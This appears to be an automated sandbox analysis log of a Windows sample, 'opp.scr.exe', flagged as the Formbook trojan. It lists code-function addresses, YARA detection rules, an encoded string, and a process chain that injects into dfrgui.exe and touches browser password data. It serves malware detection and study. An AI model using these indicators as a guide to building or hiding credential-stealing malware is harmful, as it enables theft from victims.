          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01715BF01_2_01715BF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016DDBF91_2_016DDBF9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BFB801_2_016BFB80
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01713A6C1_2_01713A6C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01757A461_2_01757A46
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175FA491_2_0175FA49
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174DAC61_2_0174DAC6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E5AA01_2_016E5AA0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01741AA31_2_01741AA3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173DAAC1_2_0173DAAC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01757D731_2_01757D73
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A3D401_2_016A3D40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01751D5A1_2_01751D5A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BFDC01_2_016BFDC0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01719C321_2_01719C32
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175FCF21_2_0175FCF2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175FF091_2_0175FF09
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175FFB11_2_0175FFB1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A1F921_2_016A1F92
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A9EB01_2_016A9EB0
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512152F8_2_0512152F
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_051234AF8_2_051234AF
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0514013F8_2_0514013F
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_05129A3A8_2_05129A3A
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_05129A3F8_2_05129A3F
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_051232868_2_05123286
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512328F8_2_0512328F
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044924469_2_04492446
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044844209_2_04484420
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0448E4F69_2_0448E4F6
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E05359_2_043E0535
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044A05919_2_044A0591
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043FC6E09_2_043FC6E0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044047509_2_04404750
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E07709_2_043E0770
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043DC7C09_2_043DC7C0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044720009_2_04472000
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044681589_2_04468158
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043D01009_2_043D0100
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0447A1189_2_0447A118
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044981CC9_2_044981CC
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044A01AA9_2_044A01AA
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044941A29_2_044941A2
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044802749_2_04480274
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044602C09_2_044602C0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449A3529_2_0449A352
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044A03E69_2_044A03E6
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043EE3F09_2_043EE3F0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E0C009_2_043E0C00
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043D0CF29_2_043D0CF2
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04480CB59_2_04480CB5
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043EAD009_2_043EAD00
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0447CD1F9_2_0447CD1F
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043F8DBF9_2_043F8DBF
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043DADE09_2_043DADE0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E0E599_2_043E0E59
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449EE269_2_0449EE26
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449EEDB9_2_0449EEDB
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043F2E909_2_043F2E90
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449CE939_2_0449CE93
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04454F409_2_04454F40
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04422F289_2_04422F28
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04400F309_2_04400F30
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04482F309_2_04482F30
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043ECFE09_2_043ECFE0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0445EFA09_2_0445EFA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043D2FC89_2_043D2FC8
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043EA8409_2_043EA840
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E28409_2_043E2840
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043C68B89_2_043C68B8
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0440E8F09_2_0440E8F0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043F69629_2_043F6962
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E29A09_2_043E29A0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044AA9A69_2_044AA9A6
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043DEA809_2_043DEA80
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449AB409_2_0449AB40
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04496BD79_2_04496BD7
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043D14609_2_043D1460
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449F43F9_2_0449F43F
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044975719_2_04497571
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044A95C39_2_044A95C3
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0447D5B09_2_0447D5B0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044256309_2_04425630
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044916CC9_2_044916CC
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449F7B09_2_0449F7B0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0448F0CC9_2_0448F0CC
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044970E99_2_044970E9
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449F0E09_2_0449F0E0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E70C09_2_043E70C0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044AB16B9_2_044AB16B
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0441516C9_2_0441516C
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043CF1729_2_043CF172
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043EB1B09_2_043EB1B0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E52A09_2_043E52A0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044812ED9_2_044812ED
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043FB2C09_2_043FB2C0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449132D9_2_0449132D
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043CD34C9_2_043CD34C
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0442739A9_2_0442739A
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04459C329_2_04459C32
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449FCF29_2_0449FCF2
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04491D5A9_2_04491D5A
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04497D739_2_04497D73
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E3D409_2_043E3D40
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043FFDC09_2_043FFDC0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E9EB09_2_043E9EB0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449FF099_2_0449FF09
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E1F929_2_043E1F92
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043A3FD29_2_043A3FD2
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043A3FD59_2_043A3FD5
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449FFB19_2_0449FFB1
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0444D8009_2_0444D800
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E38E09_2_043E38E0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_044759109_2_04475910
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043E99509_2_043E9950
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043FB9509_2_043FB950
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449FA499_2_0449FA49
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04497A469_2_04497A46
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04453A6C9_2_04453A6C
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0448DAC69_2_0448DAC6
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04425AA09_2_04425AA0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0447DAAC9_2_0447DAAC
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04481AA39_2_04481AA3
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0449FB769_2_0449FB76
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_04455BF09_2_04455BF0
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_0441DBF99_2_0441DBF9
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043FFB809_2_043FFB80
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: String function: 0171F290 appears 105 times
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: String function: 0170EA12 appears 86 times
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: String function: 016E7E54 appears 111 times
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: String function: 016D5130 appears 58 times
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: String function: 0168B970 appears 280 times
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: String function: 0445F290 appears 105 times
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: String function: 043CB970 appears 280 times
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: String function: 04427E54 appears 111 times
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: String function: 0444EA12 appears 86 times
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: String function: 04415130 appears 58 times
          Source: opp.scr.exe, 00000000.00000002.1993109021.00000000057D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs opp.scr.exe
          Source: opp.scr.exe, 00000000.00000000.1987033740.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHOSTNAME.exel% vs opp.scr.exe
          Source: opp.scr.exe, 00000000.00000002.1993405256.00000000058C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs opp.scr.exe
          Source: opp.scr.exe, 00000000.00000002.1992294507.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs opp.scr.exe
          Source: opp.scr.exe, 00000000.00000002.1992388904.00000000040D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs opp.scr.exe
          Source: opp.scr.exe, 00000001.00000002.2394022437.000000000178D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs opp.scr.exe
          Source: opp.scr.exe, 00000001.00000002.2393570245.0000000001207000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelhdfrgui.exej% vs opp.scr.exe
          Source: opp.scr.exeBinary or memory string: OriginalFilenameHOSTNAME.exel% vs opp.scr.exe
          Source: opp.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 1.2.opp.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.opp.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.opp.scr.exe.4146390.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 0.2.opp.scr.exe.57d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 0.2.opp.scr.exe.57d0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 0.2.opp.scr.exe.4146390.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 0.2.opp.scr.exe.30e1c3c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 0.2.opp.scr.exe.30df3fc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 00000000.00000002.1993109021.00000000057D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
          Source: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3859938760.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.2689683266.0000000004130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.2689714641.0000000004170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.2393254649.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.3858270697.0000000004E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.2399808380.00000000041B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: opp.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.opp.scr.exe.57d0000.3.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.opp.scr.exe.4146390.2.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.opp.scr.exe.57d0000.3.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
          Source: 0.2.opp.scr.exe.4146390.2.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
          Source: opp.scr.exeBinary or memory string: MSB2013: The project-to-project reference with GUID {0} could not be converted because a valid .SLN file containing all projects could not be found.
          Source: opp.scr.exeBinary or memory string: .vbproj
          Source: opp.scr.exeBinary or memory string: .csproj
          Source: opp.scr.exeBinary or memory string: .csprojM{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}
          Source: opp.scr.exeBinary or memory string: .vbprojM{F184B08F-C81C-45F6-A57F-5ABD9991F28F}
          Source: opp.scr.exeBinary or memory string: *.sln.sln
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/10@4/5
          Source: C:\Users\user\Desktop\opp.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\opp.scr.exe.logJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeMutant created: NULL
          Source: C:\Windows\SysWOW64\dfrgui.exeFile created: C:\Users\user\AppData\Local\Temp\13d6pS3Jump to behavior
          Source: opp.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: opp.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\opp.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: dfrgui.exe, 00000009.00000002.2688193511.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2621939035.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2621803630.00000000004A7000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2688193511.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2688193511.00000000004F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: opp.scr.exeReversingLabs: Detection: 34%
          Source: opp.scr.exeVirustotal: Detection: 45%
          Source: unknownProcess created: C:\Users\user\Desktop\opp.scr.exe "C:\Users\user\Desktop\opp.scr.exe"
          Source: C:\Users\user\Desktop\opp.scr.exeProcess created: C:\Users\user\Desktop\opp.scr.exe "C:\Users\user\Desktop\opp.scr.exe"
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,10687501719211606552,13801376808827217908,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\opp.scr.exeProcess created: C:\Users\user\Desktop\opp.scr.exe "C:\Users\user\Desktop\opp.scr.exe"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,10687501719211606552,13801376808827217908,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: msasn1.dllJump to behavior
